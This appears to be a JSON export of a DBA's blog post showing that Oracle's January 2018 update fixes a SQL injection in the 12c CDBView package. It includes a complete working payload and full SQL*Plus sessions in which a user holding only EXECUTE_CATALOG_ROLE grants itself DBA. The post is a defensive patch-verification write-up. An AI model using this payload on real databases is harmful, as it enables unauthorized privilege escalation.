{"id":3296,"date":"2018-01-26T09:33:02","date_gmt":"2018-01-26T11:33:02","guid":{"rendered":"http:\/\/www.dbarj.com.br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/"},"modified":"2018-01-26T09:33:02","modified_gmt":"2018-01-26T11:33:02","slug":"sql-injection-on-12c-cbview-package-finally-fixed-on-180116","status":"publish","type":"post","link":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/","title":{"rendered":"SQL Injection on 12c CDBView package finally fixed on 180116"},"content":{"rendered":"<p>Since last quarter of 2016, a very easy to explore SQL Injection came to public where having a combination CREATE SESSION + EXECUTE_CATALOG_ROLE, an user could escalate his privileges to DBA. The first time I&#8217;ve read about this leak was on\u00a0<a href=\"https:\/\/mahmoudhatem.wordpress.com\/2016\/12\/14\/sql-injection-vulnerability-cdbview-package\/\" target=\"_blank\" rel=\"noopener\">Mahmoud Hatem blog<\/a>.<\/p>\n<p>This SQL Injection affects 12.1.0.2 and 12.2.0.1 when the user has this privileges on CDB$ROOT or if it is a non-CDB.<\/p>\n<p>After investigating all the <a href=\"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/dissecting-180116-bp-psu-ru-rur\/\" target=\"_blank\" rel=\"noopener\">code changes performed by 180116 CPU on BPs, PSUs, RU and RURs<\/a>\u00a0(for all changes click on the link), I could notice that oracle created a subfunction called\u00a0<em><strong>isLegalOwnerViewName<\/strong><\/em> in CDBView to do something similar to DBMS_ASSERT:<\/p>\n<p id=\"YffyAdD\"><img loading=\"lazy\" decoding=\"async\" width=\"1222\" height=\"622\" class=\"alignnone size-full wp-image-3057 \" src=\"http:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/img_5a6b0c5a12799.png\" alt=\"\" srcset=\"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/img_5a6b0c5a12799.png 1222w, https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/img_5a6b0c5a12799-300x153.png 300w, https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/img_5a6b0c5a12799-768x391.png 768w, https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/img_5a6b0c5a12799-1024x521.png 1024w\" sizes=\"auto, (max-width: 1222px) 100vw, 1222px\" \/><\/p>\n<p>Checking the <a href=\"http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujan2018-3236628.html#AppendixDB\" target=\"_blank\" rel=\"noopener\">list of all CVUs corrected<\/a> by this updates, we can then infer that this bug is the <strong>CVE-2017-10282<\/strong> created only on\u00a021\/June\/2017.<\/p>\n<p>Let&#8217;s try to apply the injection in a 12.2 version with 171017 RU and 180116 RU, comparing the results:<\/p>\n<p>On 12.2.0.1 with RU\u00a0<strong>171017\u00a0<\/strong> applied:<\/p>\n<p><span style=\"color: #800000;\"><strong>WARNING: In this Example the view ALL_CUBES will be replaced.<\/strong><\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">[oracle@localhost ~]$ opatch lspatches\r\n26710464;Database Release Update : 12.2.0.1.171017 (26710464)\r\n\r\nOPatch succeeded.\r\n[oracle@localhost ~]$ sqlplus \/ as sysdba\r\n\r\nSQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:10:29 2018\r\n\r\nCopyright (c) 1982, 2016, Oracle.  All rights reserved.\r\n\r\n\r\nConnected to:\r\nOracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production\r\n\r\nSQL&gt; create user c##dbarj identified by oracle;\r\n\r\nUser created.\r\n\r\nSQL&gt; grant create session to c##dbarj;\r\n\r\nGrant succeeded.\r\n\r\nSQL&gt; grant execute_catalog_role to c##dbarj;\r\n\r\nGrant succeeded.\r\n\r\nSQL&gt; conn c##dbarj\/oracle\r\nConnected.\r\nSQL&gt; select granted_role from user_role_privs;\r\n\r\nGRANTED_ROLE\r\n--------------------------------------------------------------------------------\r\nEXECUTE_CATALOG_ROLE\r\n\r\nSQL&gt; -- DON'T RUN IN PRODUCTION --\r\nSQL&gt; exec sys.CDBView.create_cdbview(true,'ALL_CUBES\" as select \/*+WITH_PLSQL*\/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN \/* ','old_view' ,' *\/ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');\r\nBEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES\" as select \/*+WITH_PLSQL*\/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN \/* ','old_view' ,' *\/ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;\r\n\r\n*\r\nERROR at line 1:\r\nORA-00905: missing keyword\r\nORA-06512: at \"SYS.CDBVIEW\", line 56\r\nORA-06512: at line 1\r\n\r\n\r\nSQL&gt; select \/*+WITH_PLSQL*\/ * from ALL_CUBES;\r\n\r\nX\r\n--------------------------------------------------------------------------------\r\n1\r\n\r\nSQL&gt; select granted_role from user_role_privs;\r\n\r\nGRANTED_ROLE\r\n--------------------------------------------------------------------------------\r\nDBA\r\nEXECUTE_CATALOG_ROLE\r\n\r\nSQL&gt;<\/pre>\n<p>The SQL Injection did work.<\/p>\n<p>And now on 12.2.0.1 with RU\u00a0<strong>180116<\/strong> applied:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">[oracle@localhost ~]$ opatch lspatches\r\n27105253;Database Release Update : 12.2.0.1.180116 (27105253)\r\n\r\nOPatch succeeded.\r\n[oracle@localhost ~]$ sqlplus \/ as sysdba\r\n\r\nSQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:20:46 2018\r\n\r\nCopyright (c) 1982, 2016, Oracle.  All rights reserved.\r\n\r\n\r\nConnected to:\r\nOracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production\r\n\r\nSQL&gt; create user c##dbarj identified by oracle;\r\n\r\nUser created.\r\n\r\nSQL&gt; grant create session to c##dbarj;\r\n\r\nGrant succeeded.\r\n\r\nSQL&gt; grant execute_catalog_role to c##dbarj;\r\n\r\nGrant succeeded.\r\n\r\nSQL&gt; conn c##dbarj\/oracle\r\nConnected.\r\nSQL&gt; select granted_role from user_role_privs;\r\n\r\nGRANTED_ROLE\r\n--------------------------------------------------------------------------------\r\nEXECUTE_CATALOG_ROLE\r\n\r\nSQL&gt; exec sys.CDBView.create_cdbview(true,'ALL_CUBES\" as select \/*+WITH_PLSQL*\/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN \/* ','old_view' ,' *\/ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');\r\nBEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES\" as select \/*+WITH_PLSQL*\/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN \/* ','old_view' ,' *\/ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;\r\n\r\n*\r\nERROR at line 1:\r\nORA-00942: table or view does not exist\r\nORA-06512: at \"SYS.CDBVIEW\", line 39\r\nORA-06512: at line 1\r\n\r\n\r\nSQL&gt; select \/*+WITH_PLSQL*\/ * from ALL_CUBES;\r\n\r\nno rows selected\r\n\r\nSQL&gt; select granted_role from user_role_privs;\r\n\r\nGRANTED_ROLE\r\n--------------------------------------------------------------------------------\r\nEXECUTE_CATALOG_ROLE\r\n\r\nSQL&gt;<\/pre>\n<p>SQL Injection didn&#8217;t work anymore.<\/p>\n<p>This is yet another reason to stay always in the latest SPU\/PSU\/BP\/RU\/RUR or whatever security fix you apply.<\/p>\n<p>References:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/dissecting-180116-bp-psu-ru-rur\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.dbarj.com.br\/en\/2018\/01\/dissecting-180116-bp-psu-ru-rur\/<\/a><\/li>\n<li><a href=\"https:\/\/mahmoudhatem.wordpress.com\/2016\/12\/14\/sql-injection-vulnerability-cdbview-package\/\" target=\"_blank\" rel=\"noopener\">https:\/\/mahmoudhatem.wordpress.com\/2016\/12\/14\/sql-injection-vulnerability-cdbview-package\/<\/a><\/li>\n<li><a href=\"http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujan2018-3236628.html#AppendixDB\" target=\"_blank\" rel=\"noopener\">http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujan2018-3236628.html#AppendixDB<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<b>Have you enjoyed? Please leave a comment or give a \ud83d\udc4d!<\/b>\n<div class='watch-action'><div class='watch-position align-left'><div class='action-like'><a class='lbg-style2 like-3296 jlk' href='javascript:void(0)' data-task='like' data-post_id='3296' data-nonce='de4404f630' rel='nofollow'><img class='wti-pixel' src='https:\/\/www.dbarj.com.br\/wp-content\/plugins\/wti-like-post\/images\/pixel.gif' title='Like' \/><span class='lc-3296 lc'>0<\/span><\/a><\/div><\/div> <div class='status-3296 status align-left'><\/div><\/div><div class='wti-clear'><\/div>","protected":false},"excerpt":{"rendered":"<p>Since last quarter of 2016, a very easy to explore SQL Injection came to public where having a combination CREATE SESSION + EXECUTE_CATALOG_ROLE, an user could escalate his privileges to DBA. The first time I&#8217;ve read about this leak was on\u00a0Mahmoud Hatem blog. This SQL Injection affects 12.1.0.2 and 12.2.0.1 when the user has this &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/\">Continue lendo<\/a><\/p>\n","protected":false},"author":1,"featured_media":3061,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":["post-3296","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","item-wrap"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SQL Injection on 12c CDBView package finally fixed on 180116 - DBA - Rodrigo Jorge - Oracle Tips and Guides<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"DBA RJ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/\"},\"author\":{\"name\":\"DBA RJ\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"headline\":\"SQL Injection on 12c CDBView package finally fixed on 180116\",\"datePublished\":\"2018-01-26T11:33:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/\"},\"wordCount\":240,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"image\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/injection-attack.jpg\",\"articleSection\":[\"Database Security\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/\",\"name\":\"SQL Injection on 12c CDBView package finally fixed on 180116 - DBA - Rodrigo Jorge - Oracle Tips and Guides\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/injection-attack.jpg\",\"datePublished\":\"2018-01-26T11:33:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/injection-attack.jpg\",\"contentUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/01\\\/injection-attack.jpg\",\"width\":1000,\"height\":482},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/2018\\\/01\\\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SQL Injection on 12c CDBView package finally fixed on 180116\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/\",\"name\":\"DBA - Rodrigo Jorge - Oracle Tips and Guides\",\"description\":\"Blog about Databases, Security and High Availability\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/pt-br\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\",\"name\":\"DBA RJ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"contentUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"width\":712,\"height\":712,\"caption\":\"DBA RJ\"},\"logo\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SQL Injection on 12c CDBView package finally fixed on 180116 - DBA - Rodrigo Jorge - Oracle Tips and Guides","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/","twitter_misc":{"Escrito por":"DBA RJ","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#article","isPartOf":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/"},"author":{"name":"DBA RJ","@id":"https:\/\/www.dbarj.com.br\/pt-br\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9"},"headline":"SQL Injection on 12c CDBView package finally fixed on 180116","datePublished":"2018-01-26T11:33:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/"},"wordCount":240,"commentCount":0,"publisher":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9"},"image":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#primaryimage"},"thumbnailUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/injection-attack.jpg","articleSection":["Database Security"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/","url":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/","name":"SQL Injection on 12c CDBView package finally fixed on 180116 - DBA - Rodrigo Jorge - Oracle Tips and Guides","isPartOf":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#primaryimage"},"image":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#primaryimage"},"thumbnailUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/injection-attack.jpg","datePublished":"2018-01-26T11:33:02+00:00","breadcrumb":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#primaryimage","url":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/injection-attack.jpg","contentUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/01\/injection-attack.jpg","width":1000,"height":482},{"@type":"BreadcrumbList","@id":"https:\/\/www.dbarj.com.br\/pt-br\/2018\/01\/sql-injection-on-12c-cbview-package-finally-fixed-on-180116\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.dbarj.com.br\/pt-br\/"},{"@type":"ListItem","position":2,"name":"SQL Injection on 12c CDBView package finally fixed on 180116"}]},{"@type":"WebSite","@id":"https:\/\/www.dbarj.com.br\/pt-br\/#website","url":"https:\/\/www.dbarj.com.br\/pt-br\/","name":"DBA - Rodrigo Jorge - Oracle Tips and Guides","description":"Blog about Databases, Security and High Availability","publisher":{"@id":"https:\/\/www.dbarj.com.br\/pt-br\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.dbarj.com.br\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":["Person","Organization"],"@id":"https:\/\/www.dbarj.com.br\/pt-br\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9","name":"DBA RJ","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png","url":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png","contentUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png","width":712,"height":712,"caption":"DBA RJ"},"logo":{"@id":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png"}}]}},"_links":{"self":[{"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/posts\/3296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/comments?post=3296"}],"version-history":[{"count":0,"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/posts\/3296\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/media\/3061"}],"wp:attachment":[{"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/media?parent=3296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/categories?post=3296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dbarj.com.br\/pt-br\/wp-json\/wp\/v2\/tags?post=3296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}